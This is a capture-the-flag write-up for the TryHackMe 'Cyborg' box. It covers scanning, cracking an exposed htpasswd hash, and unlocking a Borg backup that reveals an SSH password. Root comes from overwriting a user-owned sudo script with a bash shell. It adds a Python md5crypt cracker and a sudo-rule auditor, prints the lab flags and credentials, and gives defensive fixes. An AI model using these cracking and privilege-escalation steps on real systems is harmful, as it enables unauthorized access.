TryHackMe-Cyborg
Cyborg
A box involving encrypted archives, source code analysis and more.
Compromise the machine and read the user.txt and root.txt
Scan the machine, how many ports are open?
Let’s start by scanning the machine with Nmap to identify the running services. There are 2 services exposed:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Answer: 2
What service is running on port 22?
Answer: SSH
What service is running on port 80?
Answer: HTTP
What is the user.txt flag?
Web enumeration
Gobuster reveals 2 interesting hidden locations:
kali@kali:/data/Cyborg$ gobuster dir -u http://10.10.61.219 -x php,txt,old,bak,zip,tar -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.219
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,old,bak,zip,tar
[+] Timeout:        10s
===============================================================
2021/04/29 11:21:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301) <------------------ interesting
/etc (Status: 301) <-------------------- interesting
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/04/29 11:25:42 Finished
===============================================================
The etc directory

The /etc directory (directory listing is enabled) contains a squid subdirectory with an interesting passwd file:
kali@kali:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/ | html2text
****** Index of /etc/squid ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] passwd 2020-12-30 02:09 52
[[ ]] squid.conf 2020-12-30 02:09 258
===========================================================================
Apache/2.4.18 (Ubuntu) Server at 10.10.61.219 Port 80
The passwd file is in Apache htpasswd format: it holds a salted APR1 ($apr1$, MD5-crypt variant) password hash, not an encrypted password, for the music_archive user:

kali@kali:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/passwd
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Save the hash to passwd.hash and crack it with John the Ripper. APR1 is only 1000 rounds of MD5, so rockyou finishes in well under a second:

kali@kali:/data/Cyborg/files$ /data/src/john/run/john passwd.hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2021-04-29 11:43) 3.846g/s 149907p/s 149907c/s 149907C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We have found credentials: music_archive:squidward.
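The crack works because APR1 is nothing more than 1000 rounds of MD5 over the password and an 8-character salt. The following Python is an added example, not part of the original writeup: it re-implements the APR1 variant of md5crypt with the standard library, verifies the hash pulled from /etc/squid/passwd against the cracked password, and runs the same dictionary attack John performed over a small constructed wordlist. The hash is the one from the page; the wordlist, function names and helper names are the example's own.

```python
"""Added example (not from the original writeup): pure-Python APR1/md5crypt so the
cracked squid credential can be verified offline, plus a tiny dictionary attack.
Standard library only. The hash is the one served at /etc/squid/passwd on the
box; the wordlist at the bottom is constructed for the example.
"""
import hashlib
from typing import Iterable, Optional

# md5crypt's own alphabet (not standard base64).
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# music_archive's hash, copied from the writeup.
SQUID_HASH = "$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn."


def _to64(value: int, count: int) -> bytes:
    """Emit `count` characters, 6 bits each, least significant bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes, magic: bytes = b"$apr1$") -> str:
    """FreeBSD md5crypt ($1$) and Apache APR1 ($apr1$) share one algorithm;
    only the magic string differs. The salt is at most 8 characters."""
    salt = salt[:8]
    # Alternate digest over pw + salt + pw.
    alt = hashlib.md5(password + salt + password).digest()

    ctx = password + magic + salt
    # Append alt, repeated until len(password) bytes have been added.
    n = len(password)
    ctx += alt * (n // 16) + alt[: n % 16]
    # Historic quirk: one extra byte per bit of len(password):
    # a NUL for set bits, the first password byte for clear bits.
    while n:
        ctx += b"\x00" if n & 1 else password[:1]
        n >>= 1
    final = hashlib.md5(ctx).digest()

    # 1000 rounds of mixing: this is the entire work factor.
    for i in range(1000):
        ctx1 = password if i & 1 else final
        if i % 3:
            ctx1 += salt
        if i % 7:
            ctx1 += password
        ctx1 += final if i & 1 else password
        final = hashlib.md5(ctx1).digest()

    # The final digest's bytes are permuted before encoding.
    enc = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (magic + salt + b"$" + enc).decode()


def verify(password: str, hashed: str) -> bool:
    """Re-derive with the salt embedded in `hashed` and compare."""
    magic, salt, _ = hashed[1:].split("$", 2)
    return md5crypt(password.encode(), salt.encode(), f"${magic}$".encode()) == hashed


def crack(hashed: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: first candidate that verifies, or None."""
    for word in wordlist:
        if verify(word, hashed):
            return word
    return None


if __name__ == "__main__":
    # Constructed mini-wordlist standing in for rockyou.txt.
    candidates = ["123456", "password", "squidward", "samantha5"]
    print(crack(SQUID_HASH, candidates))
```

Any fixed 1000-iteration MD5 construction is cheap to brute-force (John reported about 150k candidates per second on two threads above). If a service must ship htpasswd files, generate them with htpasswd -B (bcrypt) and keep them out of the web root.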
The admin directory

The other hidden location (/admin) is a website about music. Playing with the menus, you will find an entry to download an archive (archive.tar). Unpacking it produces a directory tree of opaque, apparently encrypted files:
kali@kali:/data/Cyborg/files$ wget http://10.10.61.219/admin/archive.tar
kali@kali:/data/Cyborg/files$ tar xf archive.tar
kali@kali:/data/Cyborg/files$ tree home/
home/
└── field
    └── dev
        └── final_archive
            ├── config
            ├── data
            │   └── 0
            │       ├── 1
            │       ├── 3
            │       ├── 4
            │       └── 5
            ├── hints.5
            ├── index.5
            ├── integrity.5
            ├── nonce
            └── README

5 directories, 10 files
The README file is the key, as it explains what this archive is: a BorgBackup repository.

kali@kali:/data/Cyborg/files/home/field/dev/final_archive$ cat README
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/
The BorgBackup archive
To know more about BorgBackup and available commands, use the official documentation.
The repository is encrypted, so every borg command prompts for the key passphrase. The password recovered from the squid passwd file, squidward, unlocks it. List all archives in the repository:

kali@kali:/data/Cyborg/files/home/field/dev$ borg list final_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive:
music_archive                        Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
List the contents of the music_archive archive:

kali@kali:/data/Cyborg/files/home/field/dev$ borg list final_archive::music_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive:
drwxr-xr-x alex   alex          0 Tue, 2020-12-29 14:55:52 home/alex
-rw-r--r-- alex   alex       3637 Mon, 2020-12-28 15:25:14 home/alex/.bashrc
-rw-r--r-- alex   alex        220 Mon, 2020-12-28 15:25:14 home/alex/.bash_logout
-rw-r--r-- alex   alex        675 Mon, 2020-12-28 15:25:14 home/alex/.profile
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:00:24 home/alex/Music
-rw------- alex   alex        439 Mon, 2020-12-28 18:26:45 home/alex/.bash_history
[REDACTED]
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 14:55:52 home/alex/Documents
-rw-r--r-- root   root        110 Tue, 2020-12-29 14:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:30 home/alex/Public
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:37 home/alex/Videos
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 14:57:14 home/alex/Desktop
-rw-r--r-- root   root         71 Tue, 2020-12-29 14:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:57 home/alex/Downloads
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:00:02 home/alex/Templates
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:26:44 home/alex/Pictures
Restore the music_archive archive; borg extract writes the files relative to the current directory:

kali@kali:/data/Cyborg/files/home/field/dev$ borg extract final_archive::music_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive:
kali@kali:/data/Cyborg/files/home/field/dev$ tree home/
home/
└── alex
    ├── Desktop
    │   └── secret.txt
    ├── Documents
    │   └── note.txt
    ├── Downloads
    ├── Music
    ├── Pictures
    ├── Public
    ├── Templates
    └── Videos

9 directories, 2 files
Connect as alex and get the user flag
The recovered archive holds two interesting files; note.txt reveals alex's credentials in clear text:

kali@kali:/data/Cyborg/files/home/field/dev$ cat home/alex/Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
kali@kali:/data/Cyborg/files/home/field/dev$ cat home/alex/Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3
Now connect with SSH as alex and read the flag:

kali@kali:/data/Cyborg/files$ ssh alex@10.10.61.219
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
What is the root.txt flag?
Checking alex's sudo privileges reveals that we can run a backup.sh script as root without a password:

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
alex owns the script, but its mode is read-only (-r-xr-xr--). That does not matter: the owner of a file can always change its mode, so a sudo rule that points at a user-owned script is as good as unrestricted root.

alex@ubuntu:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh
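The Python below is an added example, not from the original writeup: it parses the sudo -l output shown above (copied verbatim into the script), classifies each NOPASSWD target by whether the invoking user owns it, can already write it, or can replace it through a writable parent directory, and then recreates the box's situation locally with a read-only script in a temporary directory to show that ownership alone yields the OWNED verdict. The function names and verdict labels are the example's own.

```python
"""Added example (not part of the original writeup): audit `sudo -l` output for
NOPASSWD targets the invoking user can hijack. backup.sh on the box was mode
-r-xr-xr-- but owned by alex; an owner can always chmod a file, so a read-only
mode is no protection. Standard library only.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List, Set, Tuple

# Output of `sudo -l` as shown in the writeup (raw string: sudo escapes ':' in secure_path).
SUDO_L = r"""Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
"""

# Matches "(runas_user : runas_group) TAG: TAG: cmd1, cmd2 ..." rule lines only.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

Rule = Tuple[str, Set[str], List[str]]


def parse_sudo_l(text: str) -> List[Rule]:
    """Return (runas, tags, [command paths]) for each command rule in sudo -l output."""
    rules: List[Rule] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and banners never start with "("
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        # Commands are comma separated; keep the executable path, drop its arguments.
        cmds = [c.strip().split()[0] for c in m.group("cmds").split(",") if c.strip()]
        rules.append((m.group("runas").strip(), tags, cmds))
    return rules


def audit_sudo_target(path: str) -> str:
    """Classify one sudo target from the invoking user's point of view.

    OWNED    - we own the file: `chmod +w`, rewrite it, run it via sudo, get root
    WRITABLE - mode, group or ACL already lets us write it
    DIR      - parent directory is writable and not sticky: rename and replace it
    MISSING  - path does not exist (sudo would refuse to run it)
    OK       - none of the above; the script's own logic still needs review
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "MISSING"
    if st.st_uid == os.geteuid():
        return "OWNED"
    if os.access(path, os.W_OK):
        return "WRITABLE"
    parent = os.path.dirname(os.path.abspath(path))
    if os.access(parent, os.W_OK) and not os.stat(parent).st_mode & stat.S_ISVTX:
        return "DIR"
    return "OK"


def audit_nopasswd(text: str) -> Dict[str, str]:
    """Verdict for every NOPASSWD command in a sudo -l dump."""
    return {
        cmd: audit_sudo_target(cmd)
        for _runas, tags, cmds in parse_sudo_l(text)
        if "NOPASSWD" in tags
        for cmd in cmds
    }


def demo_writeup_case() -> Dict[str, str]:
    """Recreate the box locally: a read-only script we own, listed as a NOPASSWD
    target, then audit it. Returns {path: verdict}."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(script, 0o554)  # -r-xr-xr--, exactly as on the target
    return audit_nopasswd(SUDO_L.replace("/etc/mp3backups/backup.sh", script))


if __name__ == "__main__":
    print(parse_sudo_l(SUDO_L))
    print(demo_writeup_case())
```

Run on the target itself, the same function reports /etc/mp3backups/backup.sh as OWNED. The fix is the usual one: anything referenced from sudoers must be root-owned, live in a root-owned directory, and be writable by nobody else.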
Since we own the file, we can make it writable ourselves and replace its content with a shell spawn. Because sudo runs it as root, the spawned shell is a root shell:

alex@ubuntu:/etc/mp3backups$ chmod +w backup.sh
alex@ubuntu:/etc/mp3backups$ cat > backup.sh << EOF
> #!/bin/bash
> /bin/bash
> EOF
alex@ubuntu:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh
root@ubuntu:/etc/mp3backups# cd /root
root@ubuntu:/root# cat root.txt
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
Root flag: flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}